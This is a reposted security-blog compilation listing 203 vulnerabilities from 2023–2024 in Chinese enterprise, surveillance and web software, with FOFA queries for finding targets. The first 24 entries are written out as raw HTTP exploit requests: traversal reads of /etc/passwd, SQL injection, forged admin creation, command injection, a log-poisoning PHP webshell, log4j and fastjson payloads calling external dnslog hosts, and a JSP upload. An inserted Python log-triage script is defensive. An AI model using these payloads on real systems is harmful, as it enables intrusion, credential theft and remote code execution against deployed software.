
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attack activity in offensive-defensive exercises, and we hope this article helps defenders. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 high-impact vulnerability PoCs disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Legal: if anything in this article infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it, or follow this public account (网络安全新视界).

Table of contents
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR Intelligent Edge Gateway userlist information disclosure
4. EasyCVR Video Management Platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun Active Safety Monitoring Cloud Platform arbitrary file download
8. Phicomm router RCE
9. DocCMS keyword unauthenticated SQL injection
10. Landray EIS Smart Collaboration Platform api.aspx arbitrary file upload
11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice Medical Cloud SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong Social Commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro Smart management platform importexport.php SQL injection
61. Zheda Enter customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng management information system CWSFinanceCommon SQL injection
65. Youkate Lianaiyun face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec Palm Campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE flow-control router remote command execution
80. Suda Tianyao software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. Sifudi LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAppSecurity MingYu security gateway aaa_local_web_preview file upload
88. DBAppSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin Legendsec SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin Legendsec SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast HD intelligent recording and broadcasting system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo Smart s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 Cloud Mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
141. Kelixun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. Tianweier fire rescue operations dispatch platform SQL injection
155. Liuling navigation page file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Ketuo fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. Hefeng multimedia information publishing system QH.aspx arbitrary file upload
163. Haoka Jituan distribution management system ue_serve.php arbitrary file upload
164. Huixiaoyuan (Anxiaoyi) campus management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin ticketing management platform SeatMapHandler SQL injection
167. Lean Value Management System DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen engineering management system arbitrary file read
180. Bangguanke CRM jiliyu SQL injection
181. Runshen Technology enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen Technology enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang library cluster management system updOpuserPw SQL injection
184. Xunrao X2Modbus gateway AddUser arbitrary user creation
185. Realor Tianyi application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi Jiahui video conferencing attachment arbitrary file read
189. Lanwang Technology clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone CloudView security management system setsystemtimeaction command execution
194. FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Flyingfish Internet behavior management system send_order.cgi command execution
196. Henan Fengsu Technology unified authentication platform password reset
197. Zheda Enter customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder full-media news editing system binary SQL injection
202. WeEngine AccountEdit arbitrary file upload
203. Honghai Cloud EHR PtFjk file upload

PoC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR Intelligent Edge Gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR Video Management Platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. Hongyun Active Safety Monitoring Cloud Platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin, then perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=…
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS Smart Collaboration Platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the written function executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the request-header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice Medical Cloud SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}
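The preface says defenders can use this list to check their own exposure. The Python script below is an added example (not part of the original article or of 网络安全新视界's material) showing one way to do that from the detection side: it triages web access-log lines against the request shapes that recur in entries 2, 5, 6, 9, 11 and 19 above. It URL-decodes the request target repeatedly (entry 9 notes that the payload is double-encoded), lower-cases it, and matches a small set of generic markers per vulnerability class (traversal and /etc/passwd or win.ini reads, error/time-based SQL injection functions, JNDI lookup strings, shell metacharacters in a query parameter). The log format (Apache/Nginx combined), the sample log lines, the class names and the marker regexes are all constructed for this example; marker matching is a starting point for hunting, not a substitute for patching or vendor fixes.

```python
"""Access-log triage for the request shapes collected above (added example).

Assumes Apache/Nginx combined-format logs; the sample lines, marker lists and
class names are constructed for this example and are not from the article.
"""
import re
from urllib.parse import unquote

# Combined log format: src ident user [time] "METHOD TARGET PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Generic markers per vulnerability class, matched against the fully decoded,
# lower-cased request target. They mirror what recurs in the PoCs above:
# traversal and /etc/passwd or win.ini reads (entries 2, 6, 7, 13, 20),
# error/time-based SQL injection (9, 11, 16, 19, 26), JNDI lookups (22, 25)
# and shell metacharacters in a query parameter (5).
MARKERS = {
    "path-traversal/file-read": [
        r"\.\./", r"/etc/(\./)*passwd", r"win\.ini", r"=file:/", r"/web-inf/",
    ],
    "sql-injection": [
        r"extractvalue\(", r"updatexml\(", r"waitfor\s*\+?\s*delay",
        r"hashbytes\(", r"@@version",
    ],
    "jndi-lookup": [r"\$\{jndi:"],
    "command-injection": [r"[?&][a-z_]+=;", r";\s*(id|whoami)\b"],
}
COMPILED = {cls: [re.compile(p) for p in pats] for cls, pats in MARKERS.items()}


def fully_decode(target, rounds=3):
    """URL-decode until stable (bounded): entry 9 notes double-encoded payloads."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_target(target):
    """Return the set of classes whose markers appear in one request target."""
    decoded = fully_decode(target).lower()
    return {cls for cls, pats in COMPILED.items()
            if any(p.search(decoded) for p in pats)}


def scan_log(lines):
    """Return one finding per log line that hits at least one marker class."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the sweep
        classes = classify_target(m.group("target"))
        if classes:
            findings.append({
                "src": m.group("src"),
                "status": int(m.group("status")),
                "classes": sorted(classes),
                "target": fully_decode(m.group("target")),
            })
    return findings


# Constructed sample log (not real traffic); targets follow entries 2, 6, 11,
# 19, 5 and 9 above, the last one double URL-encoded as entry 9 describes.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2024:07:41:00 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [05/Jun/2024:07:41:02 +0000] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1843',
    '198.51.100.9 - - [05/Jun/2024:07:42:10 +0000] "GET /dossier/doc_fileedit_word.aspx?recordid=1%27%20and%201=@@version--+&edittype=1,1 HTTP/1.1" 500 512',
    '198.51.100.9 - - [05/Jun/2024:07:42:11 +0000] "GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27a%27=%27a HTTP/1.1" 500 720',
    '192.0.2.5 - - [05/Jun/2024:07:43:00 +0000] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 64',
    '192.0.2.5 - - [05/Jun/2024:07:43:20 +0000] "GET /search/index.php?keyword=%2527%2520and%2520%2528extractvalue%25281%252Cconcat%25280x7e%252C%2528select%2520user%2528%2529%2529%252C0x7e%2529%2529%2529%2523 HTTP/1.1" 200 2210',
    '192.0.2.5 - - [05/Jun/2024:07:43:30 +0000] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["src"], f["status"], ",".join(f["classes"]), f["target"])
```

Two design points worth noting: the Sangfor entry (6) reads /etc/./passwd rather than /etc/passwd, so a literal string match would miss it, which is why the traversal marker tolerates ./ segments; and the bounded decode loop means a payload hidden behind two layers of percent-encoding is compared in its plain form, while the HTTP status is carried along because a 200 on a traversal request is a stronger signal than a 404.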

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

